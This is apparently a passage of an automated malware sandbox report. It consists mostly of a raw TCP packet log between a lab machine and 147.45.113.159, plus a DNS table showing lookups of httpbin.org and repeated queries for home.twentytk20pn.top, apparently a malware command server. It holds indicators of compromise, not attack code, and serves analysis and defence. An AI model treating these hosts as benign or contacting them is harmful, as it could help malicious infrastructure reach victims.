                                                              Dec 20, 2024 16:40:50.331391096 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331456900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331532955 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331542969 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331604004 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331639051 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331808090 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.366700888 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.366780043 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.411427975 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.411464930 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.411567926 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.411628008 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442652941 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442759991 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442784071 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442795038 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442833900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443003893 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443042040 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443069935 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443192959 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443202972 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443391085 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443401098 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443409920 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443419933 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443497896 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.445262909 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.445337057 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.486774921 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.486785889 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.486877918 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.486993074 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487118959 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487128973 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487267017 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487277031 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487425089 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487498045 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487610102 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487660885 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487736940 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487812996 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487878084 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487890005 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488044977 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488055944 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488117933 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488127947 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488161087 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488202095 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488348961 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488513947 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488524914 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488683939 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488698959 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488703012 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488712072 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488723993 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488872051 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488883018 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488893032 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488903046 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488912106 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488922119 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489031076 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489124060 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489173889 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489202023 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489212990 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489326954 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489336014 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489346981 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489463091 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489473104 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489569902 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489578962 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489717960 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489727974 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489737988 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489765882 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489775896 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489784956 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.492221117 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.492286921 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.564779043 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.564848900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.564858913 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565048933 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565058947 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565069914 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565082073 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565090895 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565160036 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565170050 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565181971 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565229893 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565324068 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565334082 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565390110 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565398932 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565419912 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565466881 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565557957 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565567970 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565618992 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565629005 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565687895 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565699100 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565710068 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565789938 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565823078 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.280806065 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.280817986 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.280941010 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.280950069 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.280966043 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.280976057 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.281086922 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.281256914 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.302335024 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.302376032 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397435904 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397475958 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397488117 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397660017 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397819996 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397830963 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397844076 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.397994995 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398112059 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398350954 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398364067 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398374081 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398385048 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398499012 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398510933 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398772001 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398783922 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.398794889 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399148941 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399265051 CET4980380192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:24.399380922 CET4980380192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:24.399399042 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399410963 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399538040 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399549007 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399674892 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399713993 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399724960 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399914980 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399925947 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399936914 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.399946928 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400011063 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400021076 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400201082 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400226116 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400310040 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400327921 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400377035 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400396109 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400466919 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400505066 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400588036 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400618076 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400708914 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400870085 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400880098 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400893927 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400903940 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.400932074 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401012897 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401026011 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401118040 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401127100 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401201010 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401211023 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401220083 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401305914 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401315928 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401324034 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401457071 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401469946 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401479959 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401489973 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401879072 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401890039 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401901960 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401911020 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401920080 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401930094 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401938915 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401948929 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401957989 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.401969910 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.402245998 CET4980380192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:24.402324915 CET4980380192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:24.491043091 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.491354942 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.491425991 CET4980380192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:24.491725922 CET4980380192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:24.518982887 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519017935 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519042015 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519063950 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519145012 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519237041 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519247055 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519330025 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519407034 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519417048 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519557953 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519608021 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519680023 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519766092 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519896030 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519906998 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.519996881 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520056009 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520097971 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520107985 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520181894 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520354033 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520364046 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520395994 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520509958 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520519018 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520574093 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520750999 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520761967 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520771027 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520900965 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520911932 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520921946 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.520932913 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521236897 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521246910 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521255970 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521260023 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521270990 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521276951 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521411896 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521421909 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521548033 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521559000 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521569967 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521912098 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521920919 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521930933 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521941900 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521950960 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521962881 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521972895 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521981955 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.521991014 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522089005 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522186041 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522244930 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522506952 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522520065 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522583008 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522593021 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522797108 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522808075 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522937059 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.522947073 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523089886 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523209095 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523289919 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523299932 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523482084 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523492098 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523500919 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523513079 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523675919 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523684978 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523694992 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523704052 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523715973 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523725986 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523879051 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523889065 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523900032 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523909092 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.523926020 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524029016 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524089098 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524097919 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524183989 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524312973 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524322033 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524368048 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524493933 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524502993 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524633884 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524704933 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524713993 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525269985 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525279999 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525289059 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525299072 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525309086 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525321007 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525330067 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525338888 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525347948 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525360107 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525368929 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525378942 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.611218929 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.611629009 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:25.224332094 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:25.344242096 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:25.344481945 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:25.344901085 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:25.464637041 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:26.724858999 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:26.724889994 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:26.725033998 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:26.725392103 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:26.844886065 CET8049809147.45.113.159192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 16:40:45.633325100 CET | 192.168.2.5 | 1.1.1.1 | 0xcc01 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:40:45.633418083 CET | 192.168.2.5 | 1.1.1.1 | 0xb3a9 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 16:40:48.779617071 CET | 192.168.2.5 | 1.1.1.1 | 0x4b4b | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:40:48.779715061 CET | 192.168.2.5 | 1.1.1.1 | 0xf5ce | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:41:22.570550919 CET | 192.168.2.5 | 1.1.1.1 | 0x2278 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:41:22.570663929 CET | 192.168.2.5 | 1.1.1.1 | 0x5dc | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 16:41:25.083064079 CET | 192.168.2.5 | 1.1.1.1 | 0x2eeb | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 16:41:25.083242893 CET | 192.168.2.5 | 1.1.1.1 | 0x4972 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
